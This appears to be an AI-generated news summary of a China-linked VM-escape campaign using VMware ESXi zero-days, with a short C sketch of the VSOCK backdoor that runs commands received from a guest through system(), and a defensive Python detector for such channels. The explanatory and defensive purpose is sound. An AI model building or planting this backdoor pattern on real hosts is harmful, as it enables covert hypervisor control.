China-Linked Hackers Exploit VMware ESXi Zero-Days for VM Escape
These articles are AI-generated summaries. Please check the original sources for full details.
China-Linked Hackers Exploit VMware ESXi Zero-Days to Escape Virtual Machines
Researchers discovered a sophisticated attack chain used by Chinese-speaking threat actors to escape VMware ESXi virtual machines, potentially leading to hypervisor compromise. The attack leveraged three zero-day vulnerabilities disclosed in March 2025 – CVE-2025-22224 (CVSS 9.3), CVE-2025-22225 (CVSS 8.2), and CVE-2025-22226 (CVSS 7.1).
Why This Matters
Idealized security models assume isolated virtual machines; however, vulnerabilities in the hypervisor itself can completely negate this isolation. A successful VM escape allows attackers to compromise the underlying host system, impacting all VMs running on it, and potentially the entire infrastructure. The scale of damage from such an attack could be catastrophic, resulting in widespread data breaches and significant financial losses.
Key Insights
- Zero-Day Exploitation: The vulnerabilities were exploited months before public disclosure, indicating a well-resourced and sophisticated attacker.
- VM Escape Techniques: The attack chain utilizes information leaks, memory corruption, and sandbox escapes to gain control of the hypervisor.
- VSOCK Communication: Attackers used VSOCK, a direct communication pathway between guest VMs and the hypervisor, to establish a backdoor, bypassing traditional network monitoring.
Working Example
// Simplified illustration of VSOCK communication (conceptual)
// Actual implementation is complex and involves low-level socket programming
#include <sys/socket.h>
#include <linux/vm_sockets.h>   // AF_VSOCK and struct sockaddr_vm (Linux header; ESXi uses the equivalent VMCI/vsock API)
#include <string.h>
#include <stdlib.h>
// Client (inside the VM)
struct sockaddr_vm addr;        // svm_family = AF_VSOCK, svm_cid = peer CID, svm_port = agreed port
int sockfd = socket(AF_VSOCK, SOCK_STREAM, 0);
connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
send(sockfd, "Execute command: ls -l", strlen("Execute command: ls -l"), 0); // send() needs a flags argument
// Server (on the ESXi host - VSOCKpuppet)
char buffer[4096];
struct sockaddr_vm cliaddr;
socklen_t clilen = sizeof(cliaddr);
int newsockfd = accept(listenfd, (struct sockaddr *)&cliaddr, &clilen);
ssize_t n = recv(newsockfd, buffer, sizeof(buffer) - 1, 0);
buffer[n > 0 ? n : 0] = '\0';   // NUL-terminate before handing the bytes to system()
system(buffer); // Executes the command received from the VM
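As an added defender-side example, not part of the original article or of any VMware tooling: a Linux-guest script that enumerates AF_VSOCK sockets through the kernel's sock_diag netlink interface (the vsock_diag module) and flags established connections whose peer is the host CID, which is where a guest-to-hypervisor channel like the one sketched above appears even though no network interface ever sees it. The struct layouts and constants are taken from the Linux UAPI headers; the netlink reply in the test is constructed, and the inode-to-PID lookup assumes a readable /proc.

```python
import os
import socket
import struct

# Constants from <linux/netlink.h>, <linux/sock_diag.h> and <linux/vm_sockets.h>
AF_VSOCK = 40
NETLINK_SOCK_DIAG = 4
SOCK_DIAG_BY_FAMILY = 20
NLM_F_REQUEST, NLM_F_DUMP = 0x1, 0x300
NLMSG_DONE = 3
VMADDR_CID_HOST = 2            # CID of the host / hypervisor-side endpoint
TCP_ESTABLISHED = 1            # vsock reuses the TCP state numbers

NLMSGHDR = struct.Struct("=IHHII")          # nlmsg_len, type, flags, seq, pid
VSOCK_REQ = struct.Struct("=BBHIIIII")      # struct vsock_diag_req
VSOCK_MSG = struct.Struct("=BBBBIIIIIII")   # struct vsock_diag_msg (32 bytes)

def build_dump_request(seq=1):
    """Netlink request asking vsock_diag to dump every AF_VSOCK socket (all states)."""
    req = VSOCK_REQ.pack(AF_VSOCK, 0, 0, 0xFFFFFFFF, 0, 0, 0, 0)
    hdr = NLMSGHDR.pack(NLMSGHDR.size + len(req), SOCK_DIAG_BY_FAMILY,
                        NLM_F_REQUEST | NLM_F_DUMP, seq, 0)
    return hdr + req

def parse_dump(data):
    """Decode a netlink dump reply into a list of vsock socket records."""
    records, off = [], 0
    while off + NLMSGHDR.size <= len(data):
        nlen, ntype, _, _, _ = NLMSGHDR.unpack_from(data, off)
        if ntype == NLMSG_DONE or nlen < NLMSGHDR.size:
            break
        if ntype == SOCK_DIAG_BY_FAMILY:
            f = VSOCK_MSG.unpack_from(data, off + NLMSGHDR.size)
            records.append({"state": f[2], "src": (f[4], f[5]), "dst": (f[6], f[7]), "inode": f[8]})
        off += (nlen + 3) & ~3          # NLMSG_ALIGN: messages are padded to 4 bytes
    return records

def host_connections(records):
    """Established vsock connections to the host CID; compare each against known agents (e.g. VMware Tools)."""
    return [r for r in records if r["state"] == TCP_ESTABLISHED and r["dst"][0] == VMADDR_CID_HOST]

def owning_pids(inode):
    """Map a socket inode to the PIDs holding it by scanning /proc/<pid>/fd symlinks."""
    target, pids = f"socket:[{inode}]", []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            if any(os.readlink(f"/proc/{pid}/fd/{fd}") == target for fd in os.listdir(f"/proc/{pid}/fd")):
                pids.append(int(pid))
        except OSError:
            continue                    # process exited or fd table not readable
    return pids

if __name__ == "__main__":
    with socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, NETLINK_SOCK_DIAG) as nl:
        nl.send(build_dump_request())
        for rec in host_connections(parse_dump(nl.recv(65536))):
            print(rec, "held by PIDs", owning_pids(rec["inode"]))
```

Any connection reported here that is not owned by an expected guest agent is worth an incident-response look, since it is invisible to network-based monitoring.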
Practical Applications
- Use Case: Cloud service providers must prioritize hypervisor security to protect customer data and prevent widespread outages.
- Pitfall: Relying solely on guest OS security measures provides a false sense of security; hypervisor vulnerabilities represent a critical attack surface.